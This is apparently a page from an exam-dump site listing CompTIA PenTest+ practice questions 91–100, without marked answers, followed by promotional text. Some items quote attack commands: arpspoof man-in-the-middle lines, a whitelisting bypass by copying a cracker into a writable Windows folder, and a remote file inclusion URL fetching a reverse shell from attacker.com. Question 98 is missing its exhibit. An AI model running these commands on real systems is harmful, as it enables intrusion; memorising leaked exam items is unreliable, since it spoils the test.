PT0-001 Exam Details

  • Exam Code
    :PT0-001
  • Exam Name
    :CompTIA PenTest+
  • Certification
    :CompTIA Certifications
  • Vendor
    :CompTIA
  • Total Questions
    :306 Q&As
  • Last Updated
    :Apr 01, 2024

CompTIA PT0-001 Online Questions & Answers

  • Question 91:

    Which of the following describe a susceptibility present in Android-based commercial mobile devices when organizations are not employing MDM services? (Choose two.)

    A. Configurations are user-customizable.
    B. End users have root access to devices by default.
    C. Push notification services require Internet access.
    D. Unsigned apps can be installed.
    E. The default device log facility does not record system actions.
    F. IPSec VPNs are not configurable.

  • Question 92:

    A static code analysis report of a web application can be leveraged to identify:

    A. business logic flaws.
    B. insufficient input sanitization.
    C. session fixation issues.
    D. client-side data storage.
    E. clickjacking.

  • Question 93:

    In which of the following components is an exploited vulnerability MOST likely to affect multiple running application containers at once?

    A. Common libraries
    B. Configuration files
    C. Sandbox escape
    D. ASLR bypass

  • Question 94:

    Which of the following situations would cause a penetration tester to communicate with a system owner/client during the course of a test? (Select TWO)

    A. The tester discovers personally identifiable data on the system
    B. The system shows evidence of prior unauthorized compromise
    C. The system shows a lack of hardening throughout
    D. The system becomes unavailable following an attempted exploit
    E. The tester discovers a finding on an out-of-scope system

  • Question 95:

    A penetration tester executes the following commands:

    C:\>%userprofile%\jtr.exe

    This program has been blocked by group policy

    C:\> accesschk.exe -w -s -q -u Users C:\Windows

    rw C:\Windows\Tracing

    C:\>copy %userprofile%\jtr.exe C:\Windows\Tracing

    C:\Windows\Tracing\jtr.exe

    jtr version 3.2...

    jtr>

    Which of the following is a local host vulnerability that the attacker is exploiting?

    A. Insecure file permissions
    B. Application Whitelisting
    C. Shell escape
    D. Writable service

  • Question 96:

    Which of the following BEST describes why an MSA is helpful?

    A. It contractually binds both parties to not disclose vulnerabilities.
    B. It reduces potential for scope creep.
    C. It clarifies the business arrangement by agreeing to specific terms.
    D. It defines the timelines for the penetration test.

  • Question 97:

    A malicious user wants to perform an MITM attack on a computer. The computer network configuration is given below:

    IP: 192.168.1.20 NETMASK: 255.255.255.0 DEFAULT GATEWAY: 192.168.1.254 DHCP: 192.168.1.253 DNS: 192.168.10.10, 192.168.20.10

    Which of the following commands should the malicious user execute to perform the MITM attack?

    A. arpspoof -c both -r -t 192.168.1.1 192.168.1.20
    B. arpspoof -t 192.168.1.20 192.168.1.254
    C. arpspoof -c both -t 192.168.1.20 192.168.1.253
    D. arpspoof -r -t 192 .168.1.253 192.168.1.20

  • Question 98:

    A penetration tester successfully exploits a Windows host and dumps the hashes Which of the following hashes can the penetration tester use to perform a pass-the-hash attack?

    A. Option A
    B. Option B
    C. Option C
    D. Option D

  • Question 99:

    A penetration tester directly connects to an internal network. Which of the following exploits would work BEST for quick lateral movement within an internal network?

    A. Crack password hashes in /etc/shadow for network authentication.
    B. Launch dictionary attacks on RDP.
    C. Conduct a whaling campaign.
    D. Poison LLMNR and NBNS requests.

  • Question 100:

    While monitoring WAF logs, a security analyst discovers a successful attack against the following URL:

    https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.php

    Which of the following remediation steps should be taken to prevent this type of attack?

    A. Implement a blacklist.
    B. Block URL redirections.
    C. Double URL encode the parameters.
    D. Stop external calls from the application.

Tips on How to Prepare for the Exams

Nowadays, the certification exams become more and more important and required by more and more enterprises when applying for a job. But how to prepare for the exam effectively? How to prepare for the exam in a short time with less efforts? How to get a ideal result and how to find the most reliable resources? Here on Vcedump.com, you will find all the answers. Vcedump.com provide not only CompTIA exam questions, answers and explanations but also complete assistance on your exam preparation and certification application. If you are confused on your PT0-001 exam preparations and CompTIA certification application, do not hesitate to visit our Vcedump.com to find your solutions here.